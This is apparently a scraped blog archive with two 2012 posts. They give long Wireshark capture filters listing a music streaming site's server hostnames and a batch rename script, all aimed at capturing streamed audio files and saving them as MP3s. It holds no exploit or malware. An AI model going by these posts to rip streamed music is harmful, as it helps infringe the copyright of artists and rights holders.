<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgsIg_MKpaswvhuDejYlM_Zc3vk6Xu3hTSNgJ5fmQUa2TfnIbWiuqUl6QHchiSOE1gw4s4EspNLAt9_CVYXvQXPbO545xLfUeJX1yWACgLS19t6xyKHWxD_86GYGfoyU20bwALFcIIFMAI/s1600/Total+-+right.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgsIg_MKpaswvhuDejYlM_Zc3vk6Xu3hTSNgJ5fmQUa2TfnIbWiuqUl6QHchiSOE1gw4s4EspNLAt9_CVYXvQXPbO545xLfUeJX1yWACgLS19t6xyKHWxD_86GYGfoyU20bwALFcIIFMAI/s640/Total+-+right.jpg" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />Unknownnoreply@blogger.com1tag:blogger.com,1999:blog-7776905799486744720.post-40963196145841994552012-06-20T05:03:00.000-10:002012-06-21T11:27:20.291-10:00Wireshark Filters - For a Different Popular Music SiteGrab music off of a different very popular music site...<br />
<br />
src host s18.first.am or s19.first.am or s20.first.am or s25.first.am or s3.first.am or x1.first.am or x2.first.am or x3.first.am or x4.first.am or s2.first.am or s4.first.am or s5.first.am or s6.first.am or s7.first.am or s8.first.am or s9.first.am or s10.first.am or s11.first.am or s12.first.am or s13.first.am or s14.first.am or s15.first.am or s16.first.am or s17.first.am or x5.first.am or x6.first.am or x7.first.am or x8.first.am or s21.first.am or s22.first.am or s23.first.am or s24.first.am or s26.<br />
<br />
I'll leave it as an exercise to the reader to figure out what the domain name is supposed to be.<br />
<br />
<strike>You're going to end up with all kinds of crap along with what you want. Such as text files, image files, you're looking for audio/mpeg.</strike><br />
Cleaned up the filter. Now it only grabs the audio files<br />
<br />
I hate doing crap manually so here's a script add the extension to the files.<br />
<br />
-=Script=-<br />
@echo off<br />
ren *.audio%2fmpeg *.mp3<br />
<br />
<strike>Yep that's it, you might have some OBJECT files left over, those are crap, just delete them. There may also be other stuff, I only did a short capture.</strike><br />
<br />
Open all the files in Winamp and send them to Auto Tag, then use MP3Tag (as was pointed out to me) to rename the file name from the metadata.Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-7776905799486744720.post-66132898876480048952012-05-31T11:27:00.002-10:002012-06-21T07:30:44.123-10:00Wireshark Filters - For a popular music site--Updated with a larger list-- <br />
<br />
Why not have a massive Wireshark capture filter to capture music a from popular music streaming site? Well that's what my thought was, a bit of DNS digging and a refresher on Wireshark capture filter syntax later and whammo you get this:<br />
<br />
<br />
src host future-208-85-40-1.popularmusicsite.com or future-208-85-40-2.popularmusicsite.com or server-net-sv3-40-3.popularmusicsite.com or server-net-sv3-40-4.popularmusicsite.com or server-net-sv3-40-7.popularmusicsite.com or server-net-sv3-40-8.popularmusicsite.com or server-net-sv3-40-11.popularmusicsite.com or server-net-sv3-40-12.popularmusicsite.com or server-net-sv3-40-13.popularmusicsite.com or server-net-sv3-40-14.popularmusicsite.com or server-net-sv3-40-15.popularmusicsite.com or server-net-sv3-40-16.popularmusicsite.com or server-ph-sv3-40-107.popularmusicsite.com or server-ph-sv3-40-108.popularmusicsite.com or server-ph-sv3-40-109.popularmusicsite.com or server-ph-sv3-40-110.popularmusicsite.com or server-ph-sv3-40-111.popularmusicsite.com or server-ph-sv3-40-112.popularmusicsite.com or server-ph-sv3-40-113.popularmusicsite.com or server-ph-sv3-40-114.popularmusicsite.com or server-ph-sv3-40-115.popularmusicsite.com or server-ph-sv3-40-116.popularmusicsite.com or server-ph-sv3-40-117.popularmusicsite.com or server-ph-sv3-40-118.popularmusicsite.com or server-ph-sv3-40-119.popularmusicsite.com or server-ph-sv3-40-120.popularmusicsite.com or server-ph-sv3-40-121.popularmusicsite.com or server-ph-sv3-40-122.popularmusicsite.com or server-ph-sv3-40-123.popularmusicsite.com or server-ph-sv3-40-124.popularmusicsite.com or server-ph-sv3-40-125.popularmusicsite.com or server-ph-sv3-40-126.popularmusicsite.com or server-ph-sv3-40-127.popularmusicsite.com or server-ph-sv3-40-128.popularmusicsite.com or server-ph-sv3-40-129.popularmusicsite.com or server-ph-sv3-40-130.popularmusicsite.com or server-ph-sv3-40-131.popularmusicsite.com or server-ph-sv3-40-133.popularmusicsite.com or server-ph-sv3-40-134.popularmusicsite.com or server-ph-sv3-40-135.popularmusicsite.com or server-ph-sv3-40-136.popularmusicsite.com or server-ph-sv3-40-137.popularmusicsite.com or server-ph-sv3-40-138.popularmusicsite.com or server-ph-sv3-40-139.popularmusicsite.com or server-ph-sv3-40-140.popularmusicsite.com or server-ph-sv3-40-141.popularmusicsite.com or server-ph-sv3-40-142.popularmusicsite.com or server-ph-sv3-40-143.popularmusicsite.com or server-ph-sv3-40-144.popularmusicsite.com or server-ph-sv3-40-145.popularmusicsite.com or server-ph-sv3-40-146.popularmusicsite.com or server-ph-sv3-40-147.popularmusicsite.com or server-ph-sv3-40-148.popularmusicsite.com or server-ph-sv3-40-149.popularmusicsite.com or server-ph-sv3-40-150.popularmusicsite.com or server-ph-sv3-40-151.popularmusicsite.com or server-ph-sv3-40-152.popularmusicsite.com or server-ph-sv3-40-153.popularmusicsite.com or server-ph-sv3-40-154.popularmusicsite.com or server-ph-sv3-40-155.popularmusicsite.com or server-ph-sv3-40-156.popularmusicsite.com or server-ph-sv3-40-157.popularmusicsite.com or server-ph-sv3-40-158.popularmusicsite.com or server-ph-sv3-40-159.popularmusicsite.com or server-ph-sv3-40-160.popularmusicsite.com or server-ph-sv3-40-161.popularmusicsite.com or server-ph-sv3-40-162.popularmusicsite.com or server-ph-sv3-40-163.popularmusicsite.com or server-ph-sv3-40-164.popularmusicsite.com or server-ph-sv3-40-165.popularmusicsite.com or server-ph-sv3-40-166.popularmusicsite.com or server-ph-sv3-40-167.popularmusicsite.com or server-ph-sv3-40-168.popularmusicsite.com or server-ph-sv3-40-169.popularmusicsite.com or server-ph-sv3-40-170.popularmusicsite.com or server-ph-sv3-40-171.popularmusicsite.com or server-ph-sv3-40-172.popularmusicsite.com or server-ph-sv3-40-173.popularmusicsite.com or server-ph-sv3-40-174.popularmusicsite.com or server-ph-sv3-40-176.popularmusicsite.com or server-ph-sv3-40-177.popularmusicsite.com or server-ph-sv3-40-178.popularmusicsite.com or server-ph-sv3-40-179.popularmusicsite.com or server-ph-sv3-40-180.popularmusicsite.com or server-ph-sv3-40-181.popularmusicsite.com or server-ph-sv3-40-182.popularmusicsite.com or server-ph-sv3-40-183.popularmusicsite.com or server-ph-sv3-40-185.popularmusicsite.com or server-ph-sv3-40-186.popularmusicsite.com or server-ph-sv3-40-187.popularmusicsite.com or server-ph-sv3-40-188.popularmusicsite.com or server-ph-sv3-40-189.popularmusicsite.com or server-ph-sv3-40-190.popularmusicsite.com or server-ph-sv3-40-191.popularmusicsite.com or server-ph-sv3-40-192.popularmusicsite.com or server-ph-sv3-40-193.popularmusicsite.com or server-ph-sv3-40-194.popularmusicsite.com or server-ph-sv3-40-195.popularmusicsite.com or server-ph-sv3-40-196.popularmusicsite.com or server-ph-sv3-40-197.popularmusicsite.com or server-ph-sv3-40-198.popularmusicsite.com or server-ph-sv3-40-199.popularmusicsite.com or server-ph-sv3-40-211.popularmusicsite.com or server-ph-sv3-40-212.popularmusicsite.com or server-ph-sv3-40-213.popularmusicsite.com or server-ph-sv3-40-214.popularmusicsite.com or server-ph-sv3-40-215.popularmusicsite.com or server-ph-sv3-40-216.popularmusicsite.com or server-ph-sv3-40-217.popularmusicsite.com or server-ph-sv3-40-218.popularmusicsite.com or server-ph-sv3-40-219.popularmusicsite.com or server-ph-sv3-40-220.popularmusicsite.com or server-ph-sv3-40-221.popularmusicsite.com or server-ph-sv3-40-222.popularmusicsite.com or server-ph-sv3-40-223.popularmusicsite.com or server-ph-sv3-40-225.popularmusicsite.com or server-ph-sv3-40-227.popularmusicsite.com or server-ph-sv3-40-228.popularmusicsite.com or server-ph-sv3-40-229.popularmusicsite.com or server-ph-sv3-40-230.popularmusicsite.com or server-ph-sv3-40-231.popularmusicsite.com or server-ph-sv3-40-232.popularmusicsite.com or server-ph-sv3-40-233.popularmusicsite.com or server-ph-sv3-40-234.popularmusicsite.com or server-ph-sv3-40-235.popularmusicsite.com or server-ph-sv3-40-236.popularmusicsite.com or server-ph-sv3-40-237.popularmusicsite.com or server-ph-sv3-40-238.popularmusicsite.com or server-ph-sv3-40-239.popularmusicsite.com or server-ph-sv3-40-240.popularmusicsite.com or server-ph-sv3-40-241.popularmusicsite.com or server-ph-sv3-40-242.popularmusicsite.com or server-ph-sv3-40-243.popularmusicsite.com or server-ph-sv3-40-244.popularmusicsite.com or server-ph-sv3-40-246.popularmusicsite.com or server-ph-sv3-40-247.popularmusicsite.com or server-ph-sv3-40-248.popularmusicsite.com or server-ph-sv3-40-249.popularmusicsite.com or server-ph-sv3-40-250.popularmusicsite.com or server-ph-sv3-40-251.popularmusicsite.com or server-ph-sv3-40-252.popularmusicsite.com or server-ph-sv3-40-253.popularmusicsite.com or server-ph-sv3-40-254.popularmusicsite.com or future-208-85-41-1.popularmusicsite.com or future-208-85-41-2.popularmusicsite.com or server-net-sv3-41-3.popularmusicsite.com or server-net-sv3-41-4.popularmusicsite.com or server-net-sv3-41-5.popularmusicsite.com or server-net-sv3-41-6.popularmusicsite.com or server-net-sv3-41-7.popularmusicsite.com or server-net-sv3-41-8.popularmusicsite.com or mediaserver-sjl-t1-1.popularmusicsite.com or mediaserver-sjl-t1-2.popularmusicsite.com or mediaserver-sjl-t1-3.popularmusicsite.com or mediaserver-sjl-t1-4.popularmusicsite.com or mediaserver-sjl-t3-4.popularmusicsite.com or mediaserver-sjl-m-2.popularmusicsite.com or mediaserver-sjl-a-1.popularmusicsite.com or mediaserver-sjl-a-2.popularmusicsite.com or mediaserver-sjl-w12-1.popularmusicsite.com or mediaserver-sjl-w12-3.popularmusicsite.com or mediaserver-sjl-w12-4.popularmusicsite.com or mediaserver-sjl-3.popularmusicsite.com or mediaserver-sjl-4.popularmusicsite.com or mediaserver-sjl-w3-1.popularmusicsite.com or mediaserver-sjl-w3-2.popularmusicsite.com or mediaserver-sjl-dev-1.popularmusicsite.com or mediaserver-sjl-dev-2.popularmusicsite.com or mediaserver-sjl-30-1.popularmusicsite.com or mediaserver-sjl-30-2.popularmusicsite.com or mediaserver-sjl-t2-1.popularmusicsite.com or mediaserver-sjl-t2-2.popularmusicsite.com or mediaserver-sjl-t3-1.popularmusicsite.com or mediaserver-sjl-t3-2.popularmusicsite.com or rtspserver-sjl-3.popularmusicsite.com or rtspserver-sjl-4.popularmusicsite.com or mediaserver-sjl-t3-3.popularmusicsite.com or audio-sjl-dev-rem.popularmusicsite.com or server-ph-sv3-41-47.popularmusicsite.com or server-ph-sv3-41-48.popularmusicsite.com or server-ph-sv3-41-49.popularmusicsite.com or server-ph-sv3-41-50.popularmusicsite.com or server-ph-sv3-41-51.popularmusicsite.com or server-ph-sv3-41-52.popularmusicsite.com or server-ph-sv3-41-53.popularmusicsite.com or server-ph-sv3-41-54.popularmusicsite.com or server-ph-sv3-41-55.popularmusicsite.com or server-ph-sv3-41-56.popularmusicsite.com or server-ph-sv3-41-57.popularmusicsite.com or server-ph-sv3-41-58.popularmusicsite.com or server-ph-sv3-41-59.popularmusicsite.com or server-ph-sv3-41-60.popularmusicsite.com or server-ph-sv3-41-61.popularmusicsite.com or server-ph-sv3-41-62.popularmusicsite.com or server-ph-sv3-41-63.popularmusicsite.com or server-ph-sv3-41-65.popularmusicsite.com or server-ph-sv3-41-66.popularmusicsite.com or server-ph-sv3-41-67.popularmusicsite.com or server-ph-sv3-41-68.popularmusicsite.com or server-ph-sv3-41-69.popularmusicsite.com or server-ph-sv3-41-70.popularmusicsite.com or server-ph-sv3-41-71.popularmusicsite.com or server-ph-sv3-41-72.popularmusicsite.com or server-ph-sv3-41-73.popularmusicsite.com or server-ph-sv3-41-74.popularmusicsite.com or server-ph-sv3-41-75.popularmusicsite.com or server-ph-sv3-41-76.popularmusicsite.com or server-ph-sv3-41-77.popularmusicsite.com or server-ph-sv3-41-78.popularmusicsite.com or server-ph-sv3-41-79.popularmusicsite.com or server-ph-sv3-41-80.popularmusicsite.com or server-ph-sv3-41-81.popularmusicsite.com or server-ph-sv3-41-82.popularmusicsite.com or server-ph-sv3-41-83.popularmusicsite.com or server-ph-sv3-41-84.popularmusicsite.com or server-ph-sv3-41-85.popularmusicsite.com or server-ph-sv3-41-86.popularmusicsite.com or server-ph-sv3-41-87.popularmusicsite.com or server-ph-sv3-41-88.popularmusicsite.com or server-ph-sv3-41-89.popularmusicsite.com or server-ph-sv3-41-90.popularmusicsite.com or server-ph-sv3-41-91.popularmusicsite.com or server-ph-sv3-41-92.popularmusicsite.com or server-ph-sv3-41-93.popularmusicsite.com or server-ph-sv3-41-94.popularmusicsite.com or server-ph-sv3-41-95.popularmusicsite.com or server-ph-sv3-41-96.popularmusicsite.com or server-ph-sv3-41-97.popularmusicsite.com or server-ph-sv3-41-98.popularmusicsite.com or server-ph-sv3-41-99.popularmusicsite.com or server-ph-sv3-41-100.popularmusicsite.com or server-ph-sv3-41-102.popularmusicsite.com or server-ph-sv3-41-103.popularmusicsite.com or server-ph-sv3-41-104.popularmusicsite.com or server-ph-sv3-41-105.popularmusicsite.com or server-ph-sv3-41-106.popularmusicsite.com or server-ph-sv3-41-107.popularmusicsite.com or server-ph-sv3-41-108.popularmusicsite.com or server-ph-sv3-41-109.popularmusicsite.com or server-ph-sv3-41-110.popularmusicsite.com or server-ph-sv3-41-111.popularmusicsite.com or server-ph-sv3-41-112.popularmusicsite.com or server-ph-sv3-41-113.popularmusicsite.com or server-ph-sv3-41-114.popularmusicsite.com or server-ph-sv3-41-115.popularmusicsite.com or server-ph-sv3-41-116.popularmusicsite.com or server-ph-sv3-41-117.popularmusicsite.com or server-ph-sv3-41-118.popularmusicsite.com or server-ph-sv3-41-119.popularmusicsite.com or server-ph-sv3-41-120.popularmusicsite.com or server-ph-sv3-41-121.popularmusicsite.com or server-ph-sv3-41-122.popularmusicsite.com or server-ph-sv3-41-123.popularmusicsite.com or server-ph-sv3-41-124.popularmusicsite.com or server-ph-sv3-41-125.popularmusicsite.com or server-ph-sv3-41-126.popularmusicsite.com or server-ph-sv3-41-127.popularmusicsite.com or server-ph-sv3-41-128.popularmusicsite.com or server-ph-sv3-41-129.popularmusicsite.com or server-ph-sv3-41-130.popularmusicsite.com or server-ph-sv3-41-131.popularmusicsite.com or server-ph-sv3-41-132.popularmusicsite.com or server-ph-sv3-41-133.popularmusicsite.com or server-ph-sv3-41-134.popularmusicsite.com or server-ph-sv3-41-135.popularmusicsite.com or server-ph-sv3-41-136.popularmusicsite.com or server-ph-sv3-41-137.popularmusicsite.com or server-ph-sv3-41-138.popularmusicsite.com or server-ph-sv3-41-139.popularmusicsite.com or server-ph-sv3-41-140.popularmusicsite.com or server-ph-sv3-41-141.popularmusicsite.com or server-ph-sv3-41-142.popularmusicsite.com or server-ph-sv3-41-143.popularmusicsite.com or server-ph-sv3-41-144.popularmusicsite.com or server-ph-sv3-41-145.popularmusicsite.com or server-ph-sv3-41-146.popularmusicsite.com or server-ph-sv3-41-147.popularmusicsite.com or server-ph-sv3-41-148.popularmusicsite.com or server-ph-sv3-41-149.popularmusicsite.com or server-ph-sv3-41-150.popularmusicsite.com or server-ph-sv3-41-151.popularmusicsite.com or server-ph-sv3-41-152.popularmusicsite.com or server-ph-sv3-41-153.popularmusicsite.com or server-ph-sv3-41-154.popularmusicsite.com or server-ph-sv3-41-155.popularmusicsite.com or server-ph-sv3-41-156.popularmusicsite.com or server-ph-sv3-41-157.popularmusicsite.com or server-ph-sv3-41-158.popularmusicsite.com or server-ph-sv3-41-159.popularmusicsite.com or server-ph-sv3-41-160.popularmusicsite.com or server-ph-sv3-41-161.popularmusicsite.com or server-ph-sv3-41-162.popularmusicsite.com or server-ph-sv3-41-163.popularmusicsite.com or server-ph-sv3-41-164.popularmusicsite.com or server-ph-sv3-41-165.popularmusicsite.com or server-ph-sv3-41-166.popularmusicsite.com or server-ph-sv3-41-167.popularmusicsite.com or server-ph-sv3-41-168.popularmusicsite.com or server-ph-sv3-41-169.popularmusicsite.com or server-ph-sv3-41-170.popularmusicsite.com or server-ph-sv3-41-171.popularmusicsite.com or server-ph-sv3-41-172.popularmusicsite.com or server-ph-sv3-41-173.popularmusicsite.com or server-ph-sv3-41-174.popularmusicsite.com or server-ph-sv3-41-175.popularmusicsite.com or server-ph-sv3-41-176.popularmusicsite.com or server-ph-sv3-41-177.popularmusicsite.com or server-ph-sv3-41-178.popularmusicsite.com or server-ph-sv3-41-179.popularmusicsite.com or server-ph-sv3-41-180.popularmusicsite.com or server-ph-sv3-41-181.popularmusicsite.com or server-ph-sv3-41-182.popularmusicsite.com or server-ph-sv3-41-183.popularmusicsite.com or server-ph-sv3-41-184.popularmusicsite.com or server-ph-sv3-41-185.popularmusicsite.com or server-ph-sv3-41-186.popularmusicsite.com or server-ph-sv3-41-187.popularmusicsite.com or server-ph-sv3-41-188.popularmusicsite.com or server-ph-sv3-41-189.popularmusicsite.com or server-ph-sv3-41-190.popularmusicsite.com or server-ph-sv3-41-191.popularmusicsite.com or server-ph-sv3-41-192.popularmusicsite.com or server-ph-sv3-41-193.popularmusicsite.com or server-ph-sv3-41-194.popularmusicsite.com or server-ph-sv3-41-195.popularmusicsite.com or server-ph-sv3-41-196.popularmusicsite.com or server-ph-sv3-41-198.popularmusicsite.com or server-ph-sv3-41-199.popularmusicsite.com or server-ph-sv3-41-200.popularmusicsite.com or server-ph-sv3-41-201.popularmusicsite.com or server-ph-sv3-41-202.popularmusicsite.com or server-ph-sv3-41-203.popularmusicsite.com or server-ph-sv3-41-204.popularmusicsite.com or server-ph-sv3-41-205.popularmusicsite.com or server-ph-sv3-41-207.popularmusicsite.com or server-ph-sv3-41-208.popularmusicsite.com or server-ph-sv3-41-209.popularmusicsite.com or server-ph-sv3-41-210.popularmusicsite.com or server-ph-sv3-41-211.popularmusicsite.com or server-ph-sv3-41-212.popularmusicsite.com or server-ph-sv3-41-213.popularmusicsite.com or server-ph-sv3-41-214.popularmusicsite.com or server-ph-sv3-41-215.popularmusicsite.com or server-ph-sv3-41-216.popularmusicsite.com or server-ph-sv3-41-217.popularmusicsite.com or server-ph-sv3-41-219.popularmusicsite.com or server-ph-sv3-41-220.popularmusicsite.com or server-ph-sv3-41-221.popularmusicsite.com or server-ph-sv3-41-222.popularmusicsite.com or server-ph-sv3-41-223.popularmusicsite.com or server-ph-sv3-41-224.popularmusicsite.com or server-ph-sv3-41-225.popularmusicsite.com or server-ph-sv3-41-226.popularmusicsite.com or server-ph-sv3-41-227.popularmusicsite.com or server-ph-sv3-41-228.popularmusicsite.com or server-ph-sv3-41-229.popularmusicsite.com or server-ph-sv3-41-230.popularmusicsite.com or server-ph-sv3-41-231.popularmusicsite.com or server-ph-sv3-41-232.popularmusicsite.com or server-ph-sv3-41-233.popularmusicsite.com or server-ph-sv3-41-234.popularmusicsite.com or server-ph-sv3-41-235.popularmusicsite.com or server-ph-sv3-41-236.popularmusicsite.com or server-ph-sv3-41-237.popularmusicsite.com or server-ph-sv3-41-238.popularmusicsite.com or server-ph-sv3-41-239.popularmusicsite.com or server-ph-sv3-41-240.popularmusicsite.com or server-ph-sv3-41-241.popularmusicsite.com or server-ph-sv3-41-242.popularmusicsite.com or server-ph-sv3-41-243.popularmusicsite.com or server-ph-sv3-41-244.popularmusicsite.com or server-ph-sv3-41-245.popularmusicsite.com or server-ph-sv3-41-246.popularmusicsite.com or server-ph-sv3-41-247.popularmusicsite.com or server-ph-sv3-41-248.popularmusicsite.com or server-ph-sv3-41-249.popularmusicsite.com or server-ph-sv3-41-250.popularmusicsite.com or server-ph-sv3-41-252.popularmusicsite.com or server-ph-sv3-41-254.popularmusicsite.com or future-208-85-42-1.popularmusicsite.com or server-net-sv3-42-7.popularmusicsite.com or server-net-sv3-42-8.popularmusicsite.com or server-net-sv3-42-9.popularmusicsite.com or server-net-sv3-42-10.popularmusicsite.com or server-net-sv3-42-10.popularmusicsite.com or server-net-sv3-42-10.popularmusicsite.com or server-net-sv3-42-10.popularmusicsite.com or server-net-sv3-42-10.popularmusicsite.com or server-net-sv3-42-10.popularmusicsite.com or server-net-sv3-42-10.popularmusicsite.com or server-net-sv3-42-17.popularmusicsite.com or server-net-sv3-42-18.popularmusicsite.com or server-net-sv3-42-19.popularmusicsite.com or mediaserver-sv5-t1-2.popularmusicsite.com or mediaserver-sv5-t2-1.popularmusicsite.com or mediaserver-sv5-t2-2.popularmusicsite.com or mediaserver-sv5-t2-3.popularmusicsite.com or mediaserver-sv5-t2-4.popularmusicsite.com or mediaserver-sv5-t3-1.popularmusicsite.com or mediaserver-sv5-t3-2.popularmusicsite.com or mediaserver-sv5-t3-3.popularmusicsite.com or mediaserver-sv5-t3-4.popularmusicsite.com or mediaserver-sv5-t1-3.popularmusicsite.com or mediaserver-sv5-t1-4.popularmusicsite.com or mediaserver-sv5-rt-1.popularmusicsite.com or server-ph-sv5-42-37.popularmusicsite.com or server-ph-sv5-42-38.popularmusicsite.com or server-ph-sv5-42-39.popularmusicsite.com or server-ph-sv5-42-40.popularmusicsite.com or server-ph-sv5-42-41.popularmusicsite.com or a4a.popularmusicsite.com or server-ph-sv5-42-43.popularmusicsite.com or server-ph-sv5-42-44.popularmusicsite.com or server-ph-sv5-42-45.popularmusicsite.com or server-ph-sv5-42-46.popularmusicsite.com or server-ph-sv5-42-47.popularmusicsite.com or server-ph-sv5-42-48.popularmusicsite.com or server-ph-sv5-42-49.popularmusicsite.com or server-ph-sv5-42-50.popularmusicsite.com or server-ph-sv5-42-51.popularmusicsite.com or server-ph-sv5-42-52.popularmusicsite.com or server-ph-sv5-42-53.popularmusicsite.com or server-ph-sv5-42-54.popularmusicsite.com or server-ph-sv5-42-56.popularmusicsite.com or server-ph-sv5-42-57.popularmusicsite.com or server-ph-sv5-42-58.popularmusicsite.com or server-ph-sv5-42-59.popularmusicsite.com or server-ph-sv5-42-60.popularmusicsite.com or server-ph-sv5-42-61.popularmusicsite.com or server-ph-sv5-42-62.popularmusicsite.com or server-ph-sv5-42-63.popularmusicsite.com or server-ph-sv5-42-64.popularmusicsite.com or server-ph-sv5-42-65.popularmusicsite.com or server-ph-sv5-42-66.popularmusicsite.com or server-ph-sv5-42-67.popularmusicsite.com or server-ph-sv5-42-68.popularmusicsite.com or server-ph-sv5-42-69.popularmusicsite.com or server-ph-sv5-42-70.popularmusicsite.com or server-ph-sv5-42-71.popularmusicsite.com or server-ph-sv5-42-72.popularmusicsite.com or server-ph-sv5-42-73.popularmusicsite.com or server-ph-sv5-42-74.popularmusicsite.com or server-ph-sv5-42-75.popularmusicsite.com or server-ph-sv5-42-76.popularmusicsite.com or server-ph-sv5-42-77.popularmusicsite.com or server-ph-sv5-42-78.popularmusicsite.com or server-ph-sv5-42-79.popularmusicsite.com or server-ph-sv5-42-80.popularmusicsite.com or server-ph-sv5-42-81.popularmusicsite.com or server-ph-sv5-42-82.popularmusicsite.com or server-ph-sv5-42-83.popularmusicsite.com or server-ph-sv5-42-84.popularmusicsite.com or server-ph-sv5-42-85.popularmusicsite.com or server-ph-sv5-42-86.popularmusicsite.com or server-ph-sv5-42-87.popularmusicsite.com or server-ph-sv5-42-88.popularmusicsite.com or server-ph-sv5-42-89.popularmusicsite.com or server-ph-sv5-42-90.popularmusicsite.com or server-ph-sv5-42-91.popularmusicsite.com or server-ph-sv5-42-92.popularmusicsite.com or server-ph-sv5-42-93.popularmusicsite.com or server-ph-sv5-42-94.popularmusicsite.com or server-ph-sv5-42-95.popularmusicsite.com or server-ph-sv5-42-96.popularmusicsite.com or server-ph-sv5-42-97.popularmusicsite.com or server-ph-sv5-42-98.popularmusicsite.com or server-ph-sv5-42-99.popularmusicsite.com or server-ph-sv5-42-100.popularmusicsite.com or server-ph-sv5-42-101.popularmusicsite.com or server-ph-sv5-42-102.popularmusicsite.com or server-ph-sv5-42-103.popularmusicsite.com or server-ph-sv5-42-104.popularmusicsite.com or server-ph-sv5-42-105.popularmusicsite.com or server-ph-sv5-42-106.popularmusicsite.com or server-ph-sv5-42-107.popularmusicsite.com or server-ph-sv5-42-108.popularmusicsite.com or server-ph-sv5-42-109.popularmusicsite.com or server-ph-sv5-42-110.popularmusicsite.com or server-ph-sv5-42-111.popularmusicsite.com or server-ph-sv5-42-112.popularmusicsite.com or server-ph-sv5-42-113.popularmusicsite.com or server-ph-sv5-42-114.popularmusicsite.com or server-ph-sv5-42-115.popularmusicsite.com or server-ph-sv5-42-116.popularmusicsite.com or server-ph-sv5-42-117.popularmusicsite.com or server-ph-sv5-42-118.popularmusicsite.com or server-ph-sv5-42-119.popularmusicsite.com or server-ph-sv5-42-120.popularmusicsite.com or server-ph-sv5-42-121.popularmusicsite.com or server-ph-sv5-42-122.popularmusicsite.com or server-ph-sv5-42-124.popularmusicsite.com or server-ph-sv5-42-126.popularmusicsite.com or server-ph-sv5-42-127.popularmusicsite.com or server-ph-sv5-42-128.popularmusicsite.com or server-ph-sv5-42-129.popularmusicsite.com or server-ph-sv5-42-130.popularmusicsite.com or server-ph-sv5-42-131.popularmusicsite.com or server-ph-sv5-42-132.popularmusicsite.com or server-ph-sv5-42-133.popularmusicsite.com or server-ph-sv5-42-134.popularmusicsite.com or server-ph-sv5-42-135.popularmusicsite.com or server-ph-sv5-42-136.popularmusicsite.com or server-ph-sv5-42-138.popularmusicsite.com or server-ph-sv5-42-139.popularmusicsite.com or server-ph-sv5-42-140.popularmusicsite.com or server-ph-sv5-42-141.popularmusicsite.com or server-ph-sv5-42-143.popularmusicsite.com or server-ph-sv5-42-144.popularmusicsite.com or server-ph-sv5-42-145.popularmusicsite.com or server-ph-sv5-42-146.popularmusicsite.com or server-ph-sv5-42-147.popularmusicsite.com or server-ph-sv5-42-148.popularmusicsite.com or server-ph-sv5-42-149.popularmusicsite.com or server-ph-sv5-42-150.popularmusicsite.com or server-ph-sv5-42-151.popularmusicsite.com or server-ph-sv5-42-153.popularmusicsite.com or server-ph-sv5-42-154.popularmusicsite.com or server-ph-sv5-42-155.popularmusicsite.com or server-ph-sv5-42-156.popularmusicsite.com or server-ph-sv5-42-157.popularmusicsite.com or server-ph-sv5-42-158.popularmusicsite.com or server-ph-sv5-42-159.popularmusicsite.com or server-ph-sv5-42-160.popularmusicsite.com or server-ph-sv5-42-161.popularmusicsite.com or server-ph-sv5-42-162.popularmusicsite.com or server-ph-sv5-42-163.popularmusicsite.com or server-ph-sv5-42-164.popularmusicsite.com or server-ph-sv5-42-165.popularmusicsite.com or server-ph-sv5-42-166.popularmusicsite.com or server-ph-sv5-42-167.popularmusicsite.com or server-ph-sv5-42-168.popularmusicsite.com or server-ph-sv5-42-169.popularmusicsite.com or server-ph-sv5-42-170.popularmusicsite.com or server-ph-sv5-42-171.popularmusicsite.com or server-ph-sv5-42-172.popularmusicsite.com or server-ph-sv5-42-173.popularmusicsite.com or server-ph-sv5-42-174.popularmusicsite.com or server-ph-sv5-42-175.popularmusicsite.com or server-ph-sv5-42-176.popularmusicsite.com or server-ph-sv5-42-177.popularmusicsite.com or server-ph-sv5-42-178.popularmusicsite.com or server-ph-sv5-42-179.popularmusicsite.com or server-ph-sv5-42-180.popularmusicsite.com or server-ph-sv5-42-181.popularmusicsite.com or server-ph-sv5-42-182.popularmusicsite.com or server-ph-sv5-42-183.popularmusicsite.com or server-ph-sv5-42-184.popularmusicsite.com or server-ph-sv5-42-185.popularmusicsite.com or server-ph-sv5-42-186.popularmusicsite.com or server-ph-sv5-42-187.popularmusicsite.com or server-ph-sv5-42-188.popularmusicsite.com or server-ph-sv5-42-189.popularmusicsite.com or server-ph-sv5-42-190.popularmusicsite.com or server-ph-sv5-42-191.popularmusicsite.com or server-ph-sv5-42-192.popularmusicsite.com or server-ph-sv5-42-193.popularmusicsite.com or server-ph-sv5-42-194.popularmusicsite.com or server-ph-sv5-42-195.popularmusicsite.com or server-ph-sv5-42-196.popularmusicsite.com or server-ph-sv5-42-197.popularmusicsite.com or server-ph-sv5-42-198.popularmusicsite.com or server-ph-sv5-42-199.popularmusicsite.com or server-ph-sv5-42-200.popularmusicsite.com or server-ph-sv5-42-201.popularmusicsite.com or server-ph-sv5-42-202.popularmusicsite.com or server-ph-sv5-42-203.popularmusicsite.com or server-ph-sv5-42-206.popularmusicsite.com or server-ph-sv5-42-208.popularmusicsite.com or server-ph-sv5-42-209.popularmusicsite.com or server-ph-sv5-42-210.popularmusicsite.com or server-ph-sv5-42-211.popularmusicsite.com or server-ph-sv5-42-212.popularmusicsite.com or server-ph-sv5-42-214.popularmusicsite.com or server-ph-sv5-42-215.popularmusicsite.com or server-ph-sv5-42-216.popularmusicsite.com or server-ph-sv5-42-217.popularmusicsite.com or server-ph-sv5-42-218.popularmusicsite.com or server-ph-sv5-42-219.popularmusicsite.com or server-ph-sv5-42-220.popularmusicsite.com or server-ph-sv5-42-221.popularmusicsite.com or server-ph-sv5-42-222.popularmusicsite.com or server-ph-sv5-42-223.popularmusicsite.com or server-ph-sv5-42-224.popularmusicsite.com or server-ph-sv5-42-225.popularmusicsite.com or server-ph-sv5-42-226.popularmusicsite.com or server-ph-sv5-42-228.popularmusicsite.com or server-ph-sv5-42-229.popularmusicsite.com or server-ph-sv5-42-230.popularmusicsite.com or server-ph-sv5-42-231.popularmusicsite.com or server-ph-sv5-42-232.popularmusicsite.com or server-ph-sv5-42-233.popularmusicsite.com or server-ph-sv5-42-234.popularmusicsite.com or server-ph-sv5-42-235.popularmusicsite.com or server-ph-sv5-42-236.popularmusicsite.com or 